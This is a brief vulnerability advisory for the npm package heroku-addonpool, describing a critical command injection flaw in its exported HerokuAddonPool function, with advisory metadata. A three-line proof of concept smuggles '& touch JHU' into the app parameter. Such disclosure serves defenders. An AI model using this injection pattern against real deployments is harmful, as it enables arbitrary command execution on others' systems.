heroku-addonpool through 0.1.15 is vulnerable to Command Injection. The second parameter of the exported function HerokuAddonPool(id, app, opt)
can be controlled by users without any sanitization.
PoC
var Root = require("heroku-addonpool");
var root = Root("sss", "& touch JHU", {});
root.setup();
{ "nvd_published_at": "2020-04-06T13:15:00Z", "cwe_ids": [ "CWE-78" ], "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2021-05-24T22:14:43Z" }